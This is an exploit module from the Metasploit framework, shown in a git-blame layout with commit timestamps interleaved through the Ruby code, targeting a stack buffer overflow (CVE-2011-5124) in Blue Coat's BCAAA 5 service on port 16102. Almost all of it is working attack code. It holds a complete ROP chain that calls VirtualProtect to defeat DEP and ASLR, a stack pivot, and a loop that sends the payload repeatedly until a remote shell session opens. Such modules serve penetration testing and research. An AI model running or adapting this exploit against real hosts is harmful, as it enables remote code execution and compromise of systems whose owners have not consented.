2011-07-09 01:40:29 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-07-09 01:40:29 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = GoodRanking
|
2011-07-09 01:40:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
2011-07-09 01:40:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow",
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),
|
|
|
|
which comes as part of the Blue Coat Authentication proxy. Please note that by default,
|
|
|
|
this exploit will attempt up to three times in order to successfully gain remote code
|
|
|
|
execution (in some cases, it takes as many as five times). This can cause your activity
|
|
|
|
to look even more suspicious. To modify the number of exploit attempts, set the
|
|
|
|
ATTEMPTS option.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Paul Harrington', # Initial discovery and PoC
|
|
|
|
'Travis Warren', # MSF Module with Universal DEP/ASLR bypass
|
|
|
|
'sinn3r', # More testing / reliability, plus minor changes
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2011-5124' ],
|
|
|
|
[ 'OSVDB', '72095'],
|
|
|
|
[ 'URL', 'https://kb.bluecoat.com/index?page=content&id=SA55' ],
|
|
|
|
[ 'URL', 'http://seclists.org/bugtraq/2011/Jul/44' ]
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 936,
|
|
|
|
'BadChars' => "\x00",
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'BCAAA Version 5.4.6.1.54128', {} ],
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'DisclosureDate' => "Apr 4 2011",
|
|
|
|
'DefaultTarget' => 0))
|
2011-07-09 01:40:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(16102),
|
|
|
|
OptInt.new("ATTEMPTS", [true, "Number of attempts to try to exploit", 3]),
|
|
|
|
], self.class)
|
|
|
|
end
|
2011-11-28 04:42:59 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def junk
|
|
|
|
return rand_text(4).unpack("L")[0].to_i
|
|
|
|
end
|
2011-07-09 01:40:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def exploit
|
2011-07-09 01:40:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
rop_gadgets = [
|
|
|
|
# rop chain generated with mona.py
|
|
|
|
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
|
|
|
|
0x7c37a140, # Make EAX readable
|
|
|
|
0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
|
|
|
|
junk, # EBP (filler)
|
|
|
|
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
|
|
|
|
0x7c37a140, # <- *&VirtualProtect()
|
|
|
|
0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
|
|
|
|
0x7c346c0b, # Slide, so next gadget would write to correct stack location
|
|
|
|
0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
|
|
|
|
junk, # EDI (filler)
|
|
|
|
junk, # will be patched at runtime (VP), then picked up into ESI
|
|
|
|
junk, # EBX (filler)
|
|
|
|
0x7c376402, # POP EBP # RETN (msvcr71.dll)
|
|
|
|
0x7c345c30, # ptr to 'push esp # ret ' (from MSVCR71.dll)
|
|
|
|
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
|
|
|
|
0xfffffdff, # size 0x00000201 -> ebx, modify if needed
|
|
|
|
0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)
|
|
|
|
0x7c354901, # POP EBX # RETN (MSVCR71.dll)
|
|
|
|
0xffffffff, # pop value into ebx
|
|
|
|
0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)
|
|
|
|
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
|
|
|
|
0x7c34d201, # POP ECX # RETN (MSVCR71.dll)
|
|
|
|
0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
|
|
|
|
0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)
|
|
|
|
0x7c34b8d8, # ROP NOP (-> edi)
|
|
|
|
0x7c344f87, # POP EDX # RETN (MSVCR71.dll)
|
|
|
|
0xffffffc0, # value to negate, target value : 0x00000040, target: edx
|
|
|
|
0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)
|
|
|
|
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
|
|
|
|
0x90909090, # NOPS (-> eax)
|
|
|
|
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
|
|
|
|
].pack("V*")
|
2011-07-09 01:40:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
pivot = [
|
|
|
|
0x7C3410C4, # RETN (MSVCR71.dll)
|
|
|
|
0x1003800C, # PUSH ESP; POP EBX; POP EBP; RETN (SmAgentAPI.dll)
|
|
|
|
0x4241467D, # EBP
|
|
|
|
0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
|
|
|
|
0x7C3417D2, # SUB EAX,EAX; RETN (MSVCR71.dll)
|
|
|
|
0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
|
|
|
|
0x7C34f6C2, # MOV EAX, EBX; POP EBX; RETN (MSVCR71.dll)
|
|
|
|
junk, # EBX
|
|
|
|
0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
|
|
|
|
0x5D02D0A0, # SUB EBP,EAX; RETN (MSVCR70.dll)
|
|
|
|
0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
|
|
|
|
0x7C3B5080, # XCHG EAX,ESP; RETN (MSVCP71.dll)
|
|
|
|
].pack("V*")
|
2011-07-09 01:40:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
attempts = datastore['ATTEMPTS']
|
2011-07-09 01:40:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
#Sometimes a few attempts are needed to get a shell back (3 or 5 times)
|
|
|
|
attempts.times do |i|
|
|
|
|
#If we have a session on the box already, then we don't continue trying
|
|
|
|
break if session_created?
|
|
|
|
buffer = rand_text(8)
|
|
|
|
buffer << rop_gadgets
|
|
|
|
buffer << payload.encoded
|
|
|
|
buffer << 'EBAB'
|
|
|
|
buffer << rand_text(8)
|
|
|
|
buffer << pivot
|
2011-07-09 01:40:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
connect
|
|
|
|
print_status("Sending request to #{rhost}. Attempt ##{(i+1).to_s}...")
|
|
|
|
sock.put(buffer)
|
|
|
|
handler
|
|
|
|
select(nil, nil, nil, 2)
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
end
|
2011-07-09 01:40:29 +00:00
|
|
|
end
|